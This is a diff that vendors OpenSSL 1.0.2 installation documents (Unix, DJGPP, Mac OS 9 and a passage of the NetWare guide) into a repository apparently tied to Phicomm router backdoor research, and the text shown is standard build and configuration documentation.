+ [Installation on DOS (with djgpp), Windows, OpenVMS, MacOS (before MacOS X)
+  and NetWare is described in INSTALL.DJGPP, INSTALL.W32, INSTALL.VMS,
+  INSTALL.MacOS and INSTALL.NW.
+  
+  This document describes installation on operating systems in the Unix
+  family.]
+
+ To install OpenSSL, you will need:
+
+  * make
+  * Perl 5
+  * an ANSI C compiler
+  * a development environment in form of development libraries and C
+    header files
+  * a supported Unix operating system
+
+ Quick Start
+ -----------
+
+ If you want to just get on with it, do:
+
+  $ ./config
+  $ make
+  $ make test
+  $ make install
+
+ [If any of these steps fails, see section Installation in Detail below.]
+
+ This will build and install OpenSSL in the default location, which is (for
+ historical reasons) /usr/local/ssl. If you want to install it anywhere else,
+ run config like this:
+
+  $ ./config --prefix=/usr/local --openssldir=/usr/local/openssl
+
+
+ Configuration Options
+ ---------------------
+
+ There are several options to ./config (or ./Configure) to customize
+ the build:
+
+  --prefix=DIR  Install in DIR/bin, DIR/lib, DIR/include/openssl.
+	        Configuration files used by OpenSSL will be in DIR/ssl
+                or the directory specified by --openssldir.
+
+  --openssldir=DIR Directory for OpenSSL files. If no prefix is specified,
+                the library files and binaries are also installed there.
+
+  no-threads    Don't try to build with support for multi-threaded
+                applications.
+
+  threads       Build with support for multi-threaded applications.
+                This will usually require additional system-dependent options!
+                See "Note on multi-threading" below.
+
+  no-zlib       Don't try to build with support for zlib compression and
+                decompression.
+
+  zlib          Build with support for zlib compression/decompression.
+
+  zlib-dynamic  Like "zlib", but has OpenSSL load the zlib library dynamically
+                when needed.  This is only supported on systems where loading
+                of shared libraries is supported.  This is the default choice.
+
+  no-shared     Don't try to create shared libraries.
+
+  shared        In addition to the usual static libraries, create shared
+                libraries on platforms where it's supported.  See "Note on
+                shared libraries" below.
+
+  no-asm        Do not use assembler code.
+
+  386           Use the 80386 instruction set only (the default x86 code is
+                more efficient, but requires at least a 486). Note: Use
+                compiler flags for any other CPU specific configuration,
+                e.g. "-m32" to build x86 code on an x64 system.
+
+  no-sse2	Exclude SSE2 code pathes. Normally SSE2 extention is
+		detected at run-time, but the decision whether or not the
+		machine code will be executed is taken solely on CPU
+		capability vector. This means that if you happen to run OS
+		kernel which does not support SSE2 extension on Intel P4
+		processor, then your application might be exposed to
+		"illegal instruction" exception. There might be a way
+		to enable support in kernel, e.g. FreeBSD kernel can be
+		compiled with CPU_ENABLE_SSE, and there is a way to
+		disengage SSE2 code pathes upon application start-up,
+		but if you aim for wider "audience" running such kernel,
+		consider no-sse2. Both 386 and no-asm options above imply
+		no-sse2.
+
+  no-<cipher>   Build without the specified cipher (bf, cast, des, dh, dsa,
+                hmac, md2, md5, mdc2, rc2, rc4, rc5, rsa, sha).
+                The crypto/<cipher> directory can be removed after running
+                "make depend".
+
+  -Dxxx, -lxxx, -Lxxx, -fxxx, -mXXX, -Kxxx These system specific options will
+                be passed through to the compiler to allow you to
+                define preprocessor symbols, specify additional libraries,
+                library directories or other compiler options.
+
+  -DHAVE_CRYPTODEV Enable the BSD cryptodev engine even if we are not using
+		BSD. Useful if you are running ocf-linux or something
+		similar. Once enabled you can also enable the use of
+		cryptodev digests, which is usually slower unless you have
+		large amounts data. Use -DUSE_CRYPTODEV_DIGESTS to force
+		it.
+
+ Installation in Detail
+ ----------------------
+
+ 1a. Configure OpenSSL for your operation system automatically:
+
+       $ ./config [options]
+
+     This guesses at your operating system (and compiler, if necessary) and
+     configures OpenSSL based on this guess. Run ./config -t to see
+     if it guessed correctly. If you want to use a different compiler, you
+     are cross-compiling for another platform, or the ./config guess was
+     wrong for other reasons, go to step 1b. Otherwise go to step 2.
+
+     On some systems, you can include debugging information as follows:
+
+       $ ./config -d [options]
+
+ 1b. Configure OpenSSL for your operating system manually
+
+     OpenSSL knows about a range of different operating system, hardware and
+     compiler combinations. To see the ones it knows about, run
+
+       $ ./Configure
+
+     Pick a suitable name from the list that matches your system. For most
+     operating systems there is a choice between using "cc" or "gcc".  When
+     you have identified your system (and if necessary compiler) use this name
+     as the argument to ./Configure. For example, a "linux-elf" user would
+     run:
+
+       $ ./Configure linux-elf [options]
+
+     If your system is not available, you will have to edit the Configure
+     program and add the correct configuration for your system. The
+     generic configurations "cc" or "gcc" should usually work on 32 bit
+     systems.
+
+     Configure creates the file Makefile.ssl from Makefile.org and
+     defines various macros in crypto/opensslconf.h (generated from
+     crypto/opensslconf.h.in).
+
+  2. Build OpenSSL by running:
+
+       $ make
+
+     This will build the OpenSSL libraries (libcrypto.a and libssl.a) and the
+     OpenSSL binary ("openssl"). The libraries will be built in the top-level
+     directory, and the binary will be in the "apps" directory.
+
+     If "make" fails, look at the output.  There may be reasons for
+     the failure that aren't problems in OpenSSL itself (like missing
+     standard headers).  If it is a problem with OpenSSL itself, please
+     report the problem to <openssl-bugs@openssl.org> (note that your
+     message will be recorded in the request tracker publicly readable
+     via http://www.openssl.org/support/rt.html and will be forwarded to a
+     public mailing list). Include the output of "make report" in your message.
+     Please check out the request tracker. Maybe the bug was already
+     reported or has already been fixed.
+
+     [If you encounter assembler error messages, try the "no-asm"
+     configuration option as an immediate fix.]
+
+     Compiling parts of OpenSSL with gcc and others with the system
+     compiler will result in unresolved symbols on some systems.
+
+  3. After a successful build, the libraries should be tested. Run:
+
+       $ make test
+
+     If a test fails, look at the output.  There may be reasons for
+     the failure that isn't a problem in OpenSSL itself (like a missing
+     or malfunctioning bc).  If it is a problem with OpenSSL itself,
+     try removing any compiler optimization flags from the CFLAG line
+     in Makefile.ssl and run "make clean; make". Please send a bug
+     report to <openssl-bugs@openssl.org>, including the output of
+     "make report" in order to be added to the request tracker at
+     http://www.openssl.org/support/rt.html.
+
+  4. If everything tests ok, install OpenSSL with
+
+       $ make install
+
+     This will create the installation directory (if it does not exist) and
+     then the following subdirectories:
+
+       certs           Initially empty, this is the default location
+                       for certificate files.
+       man/man1        Manual pages for the 'openssl' command line tool
+       man/man3        Manual pages for the libraries (very incomplete)
+       misc            Various scripts.
+       private         Initially empty, this is the default location
+                       for private key files.
+
+     If you didn't choose a different installation prefix, the
+     following additional subdirectories will be created:
+
+       bin             Contains the openssl binary and a few other 
+                       utility programs. 
+       include/openssl Contains the header files needed if you want to
+                       compile programs with libcrypto or libssl.
+       lib             Contains the OpenSSL library files themselves.
+
+     Use "make install_sw" to install the software without documentation,
+     and "install_docs_html" to install HTML renditions of the manual
+     pages.
+
+     Package builders who want to configure the library for standard
+     locations, but have the package installed somewhere else so that
+     it can easily be packaged, can use
+
+       $ make INSTALL_PREFIX=/tmp/package-root install
+
+     (or specify "--install_prefix=/tmp/package-root" as a configure
+     option).  The specified prefix will be prepended to all
+     installation target filenames.
+
+
+  NOTE: The header files used to reside directly in the include
+  directory, but have now been moved to include/openssl so that
+  OpenSSL can co-exist with other libraries which use some of the
+  same filenames.  This means that applications that use OpenSSL
+  should now use C preprocessor directives of the form
+
+       #include <openssl/ssl.h>
+
+  instead of "#include <ssl.h>", which was used with library versions
+  up to OpenSSL 0.9.2b.
+
+  If you install a new version of OpenSSL over an old library version,
+  you should delete the old header files in the include directory.
+
+  Compatibility issues:
+
+  *  COMPILING existing applications
+
+     To compile an application that uses old filenames -- e.g.
+     "#include <ssl.h>" --, it will usually be enough to find
+     the CFLAGS definition in the application's Makefile and
+     add a C option such as
+
+          -I/usr/local/ssl/include/openssl
+
+     to it.
+
+     But don't delete the existing -I option that points to
+     the ..../include directory!  Otherwise, OpenSSL header files
+     could not #include each other.
+
+  *  WRITING applications
+
+     To write an application that is able to handle both the new
+     and the old directory layout, so that it can still be compiled
+     with library versions up to OpenSSL 0.9.2b without bothering
+     the user, you can proceed as follows:
+
+     -  Always use the new filename of OpenSSL header files,
+        e.g. #include <openssl/ssl.h>.
+
+     -  Create a directory "incl" that contains only a symbolic
+        link named "openssl", which points to the "include" directory
+        of OpenSSL.
+        For example, your application's Makefile might contain the
+        following rule, if OPENSSLDIR is a pathname (absolute or
+        relative) of the directory where OpenSSL resides:
+
+        incl/openssl:
+        	-mkdir incl
+        	cd $(OPENSSLDIR) # Check whether the directory really exists
+        	-ln -s `cd $(OPENSSLDIR); pwd`/include incl/openssl
+
+        You will have to add "incl/openssl" to the dependencies
+        of those C files that include some OpenSSL header file.
+
+     -  Add "-Iincl" to your CFLAGS.
+
+     With these additions, the OpenSSL header files will be available
+     under both name variants if an old library version is used:
+     Your application can reach them under names like <openssl/foo.h>,
+     while the header files still are able to #include each other
+     with names of the form <foo.h>.
+
+
+ Note on multi-threading
+ -----------------------
+
+ For some systems, the OpenSSL Configure script knows what compiler options
+ are needed to generate a library that is suitable for multi-threaded
+ applications.  On these systems, support for multi-threading is enabled
+ by default; use the "no-threads" option to disable (this should never be
+ necessary).
+
+ On other systems, to enable support for multi-threading, you will have
+ to specify at least two options: "threads", and a system-dependent option.
+ (The latter is "-D_REENTRANT" on various systems.)  The default in this
+ case, obviously, is not to include support for multi-threading (but
+ you can still use "no-threads" to suppress an annoying warning message
+ from the Configure script.)
+
+
+ Note on shared libraries
+ ------------------------
+
+ Shared libraries have certain caveats.  Binary backward compatibility
+ can't be guaranteed before OpenSSL version 1.0.  The only reason to
+ use them would be to conserve memory on systems where several programs
+ are using OpenSSL.
+
+ For some systems, the OpenSSL Configure script knows what is needed to
+ build shared libraries for libcrypto and libssl.  On these systems,
+ the shared libraries are currently not created by default, but giving
+ the option "shared" will get them created.  This method supports Makefile
+ targets for shared library creation, like linux-shared.  Those targets
+ can currently be used on their own just as well, but this is expected
+ to change in future versions of OpenSSL.
+
+ Note on random number generation
+ --------------------------------
+
+ Availability of cryptographically secure random numbers is required for
+ secret key generation. OpenSSL provides several options to seed the
+ internal PRNG. If not properly seeded, the internal PRNG will refuse
+ to deliver random bytes and a "PRNG not seeded error" will occur.
+ On systems without /dev/urandom (or similar) device, it may be necessary
+ to install additional support software to obtain random seed.
+ Please check out the manual pages for RAND_add(), RAND_bytes(), RAND_egd(),
+ and the FAQ for more information.
+
+ Note on support for multiple builds
+ -----------------------------------
+
+ OpenSSL is usually built in its source tree.  Unfortunately, this doesn't
+ support building for multiple platforms from the same source tree very well.
+ It is however possible to build in a separate tree through the use of lots
+ of symbolic links, which should be prepared like this:
+
+	mkdir -p objtree/"`uname -s`-`uname -r`-`uname -m`"
+	cd objtree/"`uname -s`-`uname -r`-`uname -m`"
+	(cd $OPENSSL_SOURCE; find . -type f) | while read F; do
+		mkdir -p `dirname $F`
+		rm -f $F; ln -s $OPENSSL_SOURCE/$F $F
+		echo $F '->' $OPENSSL_SOURCE/$F
+	done
+	make -f Makefile.org clean
+
+ OPENSSL_SOURCE is an environment variable that contains the absolute (this
+ is important!) path to the OpenSSL source tree.
+
+ Also, operations like 'make update' should still be made in the source tree.
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/INSTALL.DJGPP b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/INSTALL.DJGPP
new file mode 100644
index 0000000..1047ec9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/INSTALL.DJGPP
@@ -0,0 +1,47 @@
+
+ 
+ INSTALLATION ON THE DOS PLATFORM WITH DJGPP
+ -------------------------------------------
+
+ OpenSSL has been ported to DJGPP, a Unix look-alike 32-bit run-time
+ environment for 16-bit DOS, but only with long filename support.
+ If you wish to compile on native DOS with 8+3 filenames, you will
+ have to tweak the installation yourself, including renaming files
+ with illegal or duplicate names.
+
+ You should have a full DJGPP environment installed, including the
+ latest versions of DJGPP, GCC, BINUTILS, BASH, etc. This package
+ requires that PERL and BC also be installed.
+
+ All of these can be obtained from the usual DJGPP mirror sites or
+ directly at "http://www.delorie.com/pub/djgpp". For help on which
+ files to download, see the DJGPP "ZIP PICKER" page at
+ "http://www.delorie.com/djgpp/zip-picker.html". You also need to have
+ the WATT-32 networking package installed before you try to compile
+ OpenSSL. This can be obtained from "http://www.bgnett.no/~giva/".
+ The Makefile assumes that the WATT-32 code is in the directory
+ specified by the environment variable WATT_ROOT. If you have watt-32
+ in directory "watt32" under your main DJGPP directory, specify
+ WATT_ROOT="/dev/env/DJDIR/watt32".
+
+ To compile OpenSSL, start your BASH shell, then configure for DJGPP by
+ running "./Configure" with appropriate arguments:
+
+	./Configure no-threads --prefix=/dev/env/DJDIR DJGPP
+ 
+ And finally fire up "make". You may run out of DPMI selectors when
+ running in a DOS box under Windows. If so, just close the BASH
+ shell, go back to Windows, and restart BASH. Then run "make" again.
+
+ RUN-TIME CAVEAT LECTOR
+ --------------
+
+ Quoting FAQ:
+
+  "Cryptographic software needs a source of unpredictable data to work
+   correctly.  Many open source operating systems provide a "randomness
+   device" (/dev/urandom or /dev/random) that serves this purpose."
+
+ As of version 0.9.7f DJGPP port checks upon /dev/urandom$ for a 3rd
+ party "randomness" DOS driver. One such driver, NOISE.SYS, can be
+ obtained from "http://www.rahul.net/dkaufman/index.html".
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/INSTALL.MacOS b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/INSTALL.MacOS
new file mode 100644
index 0000000..01c60d8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/INSTALL.MacOS
@@ -0,0 +1,72 @@
+OpenSSL - Port To The Macintosh OS 9 or Earlier
+===============================================
+
+Thanks to Roy Wood <roy@centricsystems.ca> initial support for Mac OS (pre
+X) is now provided. "Initial" means that unlike other platforms where you
+get an SDK and a "swiss army" openssl application, on Macintosh you only
+get one sample application which fetches a page over HTTPS(*) and dumps it
+in a window. We don't even build the test applications so that we can't
+guarantee that all algorithms are operational.
+
+Required software:
+
+- StuffIt Expander 5.5 or later, alternatively MacGzip and SUNtar;
+- Scriptable Finder;
+- CodeWarrior Pro 5;
+
+Installation procedure:
+
+- fetch the source at ftp://ftp.openssl.org/ (well, you probably already
+  did, huh?)
+- unpack the .tar.gz file:
+	- if you have StuffIt Expander then just drag it over it;
+	- otherwise uncompress it with MacGzip and then unpack with SUNtar;
+- locate MacOS folder in OpenSSL source tree and open it;
+- unbinhex mklinks.as.hqx and OpenSSL.mcp.hqx if present (**), do it
+  "in-place", i.e. unpacked files should end-up in the very same folder;
+- execute mklinks.as;
+- open OpenSSL.mcp(***) and build 'GetHTTPS PPC' target(****);
+- that's it for now;
+
+(*)	URL is hardcoded into ./MacOS/GetHTTPS.src/GetHTTPS.cpp, lines 40
+        to 42, change appropriately.
+(**)	If you use SUNtar, then it might have already unbinhexed the files
+	in question.
+(***)	The project file was saved with CW Pro 5.3. If you have an earlier
+	version and it refuses to open it, then download
+	http://www.openssl.org/~appro/OpenSSL.mcp.xml and import it
+	overwriting the original OpenSSL.mcp.
+(****)	Other targets are works in progress. If you feel like giving 'em a
+	shot, then you should know that OpenSSL* and Lib* targets are
+	supposed to be built with the GUSI, MacOS library which mimics
+	BSD sockets and some other POSIX APIs. The GUSI distribution is
+	expected to be found in the same directory as the openssl source tree,
+	i.e., in the parent directory to the one where this very file,
+	namely INSTALL.MacOS, resides. For more information about GUSI, see
+	http://www.iis.ee.ethz.ch/~neeri/macintosh/gusi-qa.html
+
+Finally some essential comments from our generous contributor:-)
+
+"I've gotten OpenSSL working on the Macintosh. It's probably a bit of a
+hack, but it works for what I'm doing. If you don't like the way I've done
+it, then feel free to change what I've done. I freely admit that I've done
+some less-than-ideal things in my port, and if you don't like the way I've
+done something, then feel free to change it-- I won't be offended!
+
+... I've tweaked "bss_sock.c" a little to call routines in a "MacSocket"
+library I wrote. My MacSocket library is a wrapper around OpenTransport,
+handling stuff like endpoint creation, reading, writing, etc. It is not
+designed as a high-performance package such as you'd use in a webserver,
+but is fine for lots of other applications. MacSocket also uses some other
+code libraries I've written to deal with string manipulations and error
+handling. Feel free to use these things in your own code, but give me
+credit and/or send me free stuff in appreciation! :-)
+
+...
+
+If you have any questions, feel free to email me as the following:
+
+roy@centricsystems.ca
+
+-Roy Wood"
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/INSTALL.NW b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/INSTALL.NW
new file mode 100644
index 0000000..609a730
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/INSTALL.NW
@@ -0,0 +1,454 @@
+
+INSTALLATION ON THE NETWARE PLATFORM
+------------------------------------
+
+Notes about building OpenSSL for NetWare.
+
+
+BUILD PLATFORM:
+---------------
+The build scripts (batch files, perl scripts, etc) have been developed and
+tested on W2K.  The scripts should run fine on other Windows platforms
+(NT, Win9x, WinXP) but they have not been tested.  They may require some
+modifications.
+
+
+Supported NetWare Platforms - NetWare 5.x, NetWare 6.x:
+-------------------------------------------------------
+OpenSSL can either use the WinSock interfaces introduced in NetWare 5,
+or the BSD socket interface.  Previous versions of NetWare, 4.x and 3.x,
+are only supported if OpenSSL is build for CLIB and BSD sockets;
+WinSock builds only support NetWare 5 and up.
+
+On NetWare there are two c-runtime libraries.  There is the legacy CLIB 
+interfaces and the newer LIBC interfaces.  Being ANSI-C libraries, the 
+functionality in CLIB and LIBC is similar but the LIBC interfaces are built 
+using Novell Kernal Services (NKS) which is designed to leverage 
+multi-processor environments.
+
+The NetWare port of OpenSSL can be configured to build using CLIB or LIBC.
+The CLIB build was developed and tested using NetWare 5.0 sp6.0a.  The LIBC 
+build was developed and tested using the NetWare 6.0 FCS.  
+
+The necessary LIBC functionality ships with NetWare 6.  However, earlier 
+NetWare 5.x versions will require updates in order to run the OpenSSL LIBC
+build (NetWare 5.1 SP8 is known to work).
+
+As of June 2005, the LIBC build can be configured to use BSD sockets instead
+of WinSock sockets. Call Configure (usually through netware\build.bat) using
+a target of "netware-libc-bsdsock" instead of "netware-libc".
+
+As of June 2007, support for CLIB and BSD sockets is also now available
+using a target of "netware-clib-bsdsock" instead of "netware-clib";
+also gcc builds are now supported on both Linux and Win32 (post 0.9.8e).
+
+REQUIRED TOOLS:
+---------------
+Based upon the configuration and build options used, some or all of the
+following tools may be required:
+
+* Perl for Win32 - required (http://www.activestate.com/ActivePerl)
+   Used to run the various perl scripts on the build platform.
+
+* Perl 5.8.0 for NetWare v3.20 (or later) - required 
+   (http://developer.novell.com) Used to run the test script on NetWare 
+   after building.
+
+* Compiler / Linker - required:
+   Metrowerks CodeWarrior PDK 2.1 (or later) for NetWare (commercial):
+      Provides command line tools used for building.
+      Tools:
+      mwccnlm.exe  - C/C++ Compiler for NetWare
+      mwldnlm.exe  - Linker for NetWare
+      mwasmnlm.exe - x86 assembler for NetWare (if using assembly option)
+
+   gcc / nlmconv Cross-Compiler, available from Novell Forge (free):
+         http://forge.novell.com/modules/xfmod/project/?aunixnw
+
+* Assemblers - optional:
+   If you intend to build using the assembly options you will need an
+   assembler.  Work has been completed to support two assemblers, Metrowerks
+   and NASM.  However, during development, a bug was found in the Metrowerks
+   assembler which generates incorrect code.  Until this problem is fixed,
+   the Metrowerks assembler cannot be used.
+
+   mwasmnlm.exe - Metrowerks x86 assembler - part of CodeWarrior tools.
+         (version 2.2 Built Aug 23, 1999 - not useable due to code
+          generation bug)
+
+   nasmw.exe - Netwide Assembler NASM
+         version 0.98 was used in development and testing
+
+* Make Tool - required:
+   In order to build you will need a make tool.  Two make tools are
+   supported, GNU make (gmake.exe) or Microsoft nmake.exe.
+
+   make.exe - GNU make for Windows (version 3.75 used for development)
+         http://gnuwin32.sourceforge.net/packages/make.htm
+
+   nmake.exe - Microsoft make (Version 6.00.8168.0 used for development)
+         http://support.microsoft.com/kb/132084/EN-US/
+
+* Novell Developer Kit (NDK) - required: (http://developer.novell.com)
+
+   CLIB - BUILDS:
+
+      WinSock2 Developer Components for NetWare:
+         For initial development, the October 27, 2000 version was used.
+         However, future versions should also work.
+
+         NOTE:  The WinSock2 components include headers & import files for
+         NetWare, but you will also need the winsock2.h and supporting
+         headers (pshpack4.h, poppack.h, qos.h) delivered in the
+         Microsoft SDK.  Note: The winsock2.h support headers may change
+         with various versions of winsock2.h.  Check the dependencies
+         section on the NDK WinSock2 download page for the latest
+         information on dependencies. These components are unsupported by
+         Novell. They are provided as a courtesy, but it is strongly
+         suggested that all development be done using LIBC, not CLIB.
+
+         As of June 2005, the WinSock2 components are available at:
+         http://forgeftp.novell.com//ws2comp/
+
+
+      NLM and NetWare libraries for C (including CLIB and XPlat):
+         If you are going to build a CLIB version of OpenSSL, you will
+         need the CLIB headers and imports.  The March, 2001 NDK release or 
+         later is recommended.
+
+         Earlier versions should work but haven't been tested.  In recent
+         versions the import files have been consolidated and function
+         names moved.  This means you may run into link problems
+         (undefined symbols) when using earlier versions.   The functions
+         are available in earlier versions, but you will have to modifiy
+         the make files to include additional import files (see
+         openssl\util\pl\netware.pl).
+
+
+   LIBC - BUILDS:
+   
+      Libraries for C (LIBC) - LIBC headers and import files
+         If you are going to build a LIBC version of OpenSSL, you will
+         need the LIBC headers and imports.  The March 14, 2002 NDK release or
+         later is required.  
+         
+         NOTE: The LIBC SDK includes the necessary WinSock2 support.
+         It is not necessary to download the WinSock2 NDK when building for
+         LIBC. The LIBC SDK also includes the appropriate BSD socket support
+         if configuring to use BSD sockets.
+
+
+BUILDING:
+---------
+Before building, you will need to set a few environment variables.  You can
+set them manually or you can modify the "netware\set_env.bat" file.
+
+The set_env.bat file is a template you can use to set up the path
+and environment variables you will need to build.  Modify the
+various lines to point to YOUR tools and run set_env.bat.
+
+   netware\set_env.bat <target> [compiler]
+
+      target        - "netware-clib" - CLIB NetWare build
+                    - "netware-libc" - LIBC NetWare build
+
+      compiler      - "gnuc"         - GNU GCC Compiler
+                    - "codewarrior"  - MetroWerks CodeWarrior (default)
+
+If you don't use set_env.bat, you will need to set up the following
+environment variables:
+
+   PATH - Set PATH to point to the tools you will use.
+
+   INCLUDE - The location of the NDK include files.
+         
+            CLIB ex: set INCLUDE=c:\ndk\nwsdk\include\nlm
+            LIBC ex: set INCLUDE=c:\ndk\libc\include
+
+   PRELUDE - The absolute path of the prelude object to link with.  For
+            a CLIB build it is recommended you use the "clibpre.o" files shipped
+            with the Metrowerks PDK for NetWare.  For a LIBC build you should 
+            use the "libcpre.o" file delivered with the LIBC NDK components.
+
+            CLIB ex: set PRELUDE=c:\ndk\nwsdk\imports\clibpre.o
+            LIBC ex: set PRELUDE=c:\ndk\libc\imports\libcpre.o
+
+   IMPORTS - The locaton of the NDK import files.
+
+            CLIB ex: set IMPORTS=c:\ndk\nwsdk\imports
+            LIBC ex: set IMPORTS=c:\ndk\libc\imports
+
+
+In order to build, you need to run the Perl scripts to configure the build
+process and generate a make file.  There is a batch file,
+"netware\build.bat", to automate the process.
+
+Build.bat runs the build configuration scripts and generates a make file.
+If an assembly option is specified, it also runs the scripts to generate 
+the assembly code.  Always run build.bat from the "openssl" directory.
+
+   netware\build [target] [debug opts] [assembly opts] [configure opts]
+
+      target        - "netware-clib" - CLIB NetWare build (WinSock Sockets)
+                    - "netware-clib-bsdsock" - CLIB NetWare build (BSD Sockets)
+                    - "netware-libc" - LIBC NetWare build (WinSock Sockets)
+                    - "netware-libc-bsdsock" - LIBC NetWare build (BSD Sockets)
+ 
+      debug opts    - "debug"  - build debug
+
+      assembly opts - "nw-mwasm" - use Metrowerks assembler
+                      "nw-nasm"  - use NASM assembler
+                      "no-asm"   - don't use assembly
+
+      configure opts- all unrecognized arguments are passed to the
+                      perl 'configure' script. See that script for
+                      internal documentation regarding options that
+                      are available.
+
+   examples:
+
+      CLIB build, debug, without assembly:
+         netware\build.bat netware-clib debug no-asm
+
+      LIBC build, non-debug, using NASM assembly, add mdc2 support:
+         netware\build.bat netware-libc nw-nasm enable-mdc2
+
+      LIBC build, BSD sockets, non-debug, without assembly:
+         netware\build.bat netware-libc-bsdsock no-asm
+
+Running build.bat generates a make file to be processed by your make 
+tool (gmake or nmake):
+
+   CLIB ex: gmake -f netware\nlm_clib_dbg.mak 
+   LIBC ex: gmake -f netware\nlm_libc.mak 
+   LIBC ex: gmake -f netware\nlm_libc_bsdsock.mak 
+
+
+You can also run the build scripts manually if you do not want to use the
+build.bat file.  Run the following scripts in the "\openssl"
+subdirectory (in the order listed below):
+
+   perl configure no-asm [other config opts] [netware-clib|netware-libc|netware-libc-bsdsock]
+      configures no assembly build for specified netware environment
+      (CLIB or LIBC).
+
+   perl util\mkfiles.pl >MINFO
+      generates a listing of source files (used by mk1mf)
+
+   perl util\mk1mf.pl no-asm [other config opts] [netware-clib|netware-libc|netware-libc-bsdsock >netware\nlm.mak
+      generates the makefile for NetWare
+
+   gmake -f netware\nlm.mak
+      build with the make tool (nmake.exe also works)
+
+NOTE:  If you are building using the assembly option, you must also run the
+various Perl scripts to generate the assembly files.  See build.bat
+for an example of running the various assembly scripts.  You must use the
+"no-asm" option to build without assembly.  The configure and mk1mf scripts
+also have various other options.  See the scripts for more information.
+
+
+The output from the build is placed in the following directories:
+
+   CLIB Debug build:
+      out_nw_clib.dbg     - static libs & test nlm(s)
+      tmp_nw_clib.dbg     - temporary build files
+      outinc_nw_clib      - necessary include files
+
+   CLIB Non-debug build:
+      out_nw_clib         - static libs & test nlm(s)
+      tmp_nw_clib         - temporary build files
+      outinc_nw_clib      - necesary include files
+
+   LIBC Debug build:
+      out_nw_libc.dbg     - static libs & test nlm(s)
+      tmp_nw_libc.dbg     - temporary build files
+      outinc_nw_libc      - necessary include files
+
+   LIBC Non-debug build:
+      out_nw_libc         - static libs & test nlm(s)
+      tmp_nw_libc         - temporary build files
+      outinc_nw_libc      - necesary include files
+
+
+TESTING:
+--------
+The build process creates the OpenSSL static libs ( crypto.lib, ssl.lib,
+rsaglue.lib ) and several test programs.  You should copy the test programs
+to your NetWare server and run the tests.
+
+The batch file "netware\cpy_tests.bat" will copy all the necessary files
+to your server for testing.  In order to run the batch file, you need a
+drive mapped to your target server.  It will create an "OpenSSL" directory
+on the drive and copy the test files to it.  CAUTION: If a directory with the
+name of "OpenSSL" already exists, it will be deleted.
+
+To run cpy_tests.bat:
+
+   netware\cpy_tests [output directory] [NetWare drive]
+
+      output directory - "out_nw_clib.dbg", "out_nw_libc", etc.
+      NetWare drive    - drive letter of mapped drive
+
+      CLIB ex: netware\cpy_tests out_nw_clib m:
+      LIBC ex: netware\cpy_tests out_nw_libc m:
+
+
+The Perl script, "do_tests.pl", in the "OpenSSL" directory on the server
+should be used to execute the tests.  Before running the script, make sure
+your SEARCH PATH includes the "OpenSSL" directory.  For example, if you
+copied the files to the "sys:" volume you use the command:
+
+   SEARCH ADD SYS:\OPENSSL
+
+
+To run do_tests.pl type (at the console prompt):
+
+   perl \openssl\do_tests.pl [options]
+
+      options:
+         -p    - pause after executing each test
+
+The do_tests.pl script generates a log file "\openssl\test_out\tests.log"
+which should be reviewed for errors.  Any errors will be denoted by the word
+"ERROR" in the log.
+
+DEVELOPING WITH THE OPENSSL SDK:
+--------------------------------
+Now that everything is built and tested, you are ready to use the OpenSSL
+libraries in your development.
+
+There is no real installation procedure, just copy the static libs and
+headers to your build location.  The libs (crypto.lib & ssl.lib) are
+located in the appropriate "out_nw_XXXX" directory 
+(out_nw_clib, out_nw_libc, etc).  
+
+The headers are located in the appropriate "outinc_nw_XXX" directory 
+(outinc_nw_clib, outinc_nw_libc).  
+
+One suggestion is to create the following directory 
+structure for the OpenSSL SDK:
+
+   \openssl
+      |- bin
+      |   |- openssl.nlm
+      |   |- (other tests you want)
+      |
+      |- lib
+      |   | - crypto.lib
+      |   | - ssl.lib
+      |
+      |- include
+      |   | - openssl
+      |   |    | - (all the headers in "outinc_nw\openssl")
+
+
+The program "openssl.nlm" can be very useful.  It has dozens of
+options and you may want to keep it handy for debugging, testing, etc.
+
+When building your apps using OpenSSL, define "NETWARE".  It is needed by
+some of the OpenSSL headers.  One way to do this is with a compile option,
+for example "-DNETWARE".
+
+
+
+NOTES:
+------
+
+Resource leaks in Tests
+------------------------
+Some OpenSSL tests do not clean up resources and NetWare reports
+the resource leaks when the tests unload.  If this really bugs you,
+you can stop the messages by setting the developer option off at the console
+prompt (set developer option = off).  Or better yet, fix the tests to
+clean up the resources!
+
+
+Multi-threaded Development
+---------------------------
+The NetWare version of OpenSSL is thread-safe, however multi-threaded
+applications must provide the necessary locking function callbacks.  This
+is described in doc\threads.doc.  The file "openssl-x.x.x\crypto\threads\mttest.c"
+is a multi-threaded test program and demonstrates the locking functions.
+
+
+What is openssl2.nlm?
+---------------------
+The openssl program has numerous options and can be used for many different
+things.  Many of the options operate in an interactive mode requiring the
+user to enter data.  Because of this, a default screen is created for the
+program.  However, when running the test script it is not desirable to
+have a seperate screen.  Therefore, the build also creates openssl2.nlm.
+Openssl2.nlm is functionally identical but uses the console screen.
+Openssl2 can be used when a non-interactive mode is desired.
+
+NOTE:  There are may other possibilities (command line options, etc)
+which could have been used to address the screen issue.  The openssl2.nlm
+option was chosen because it impacted only the build not the code.
+
+
+Why only static libraries?
+--------------------------
+Globals, globals, and more globals.  The OpenSSL code uses many global
+variables that are allocated and initialized when used for the first time.
+
+On NetWare, most applications (at least historically) run in the kernel.
+When running in the kernel, there is one instance of global variables.
+For regular application type NLM(s) this isn't a problem because they are
+the only ones using the globals.  However, for a library NLM (an NLM which
+exposes functions and has no threads of execution), the globals cause
+problems.  Applications could inadvertently step on each other if they
+change some globals.  Even worse, the first application that triggers a
+global to be allocated and initialized has the allocated memory charged to
+itself.  Now when that application unloads, NetWare will clean up all the
+applicaton's memory.  The global pointer variables inside OpenSSL now
+point to freed memory.  An abend waiting to happen!
+
+To work correctly in the kernel, library NLM(s) that use globals need to
+provide a set of globals (instance data) for each application.  Another
+option is to require the library only be loaded in a protected address
+space along with the application using it.
+
+Modifying the OpenSSL code to provide a set of globals (instance data) for
+each application isn't technically difficult, but due to the large number
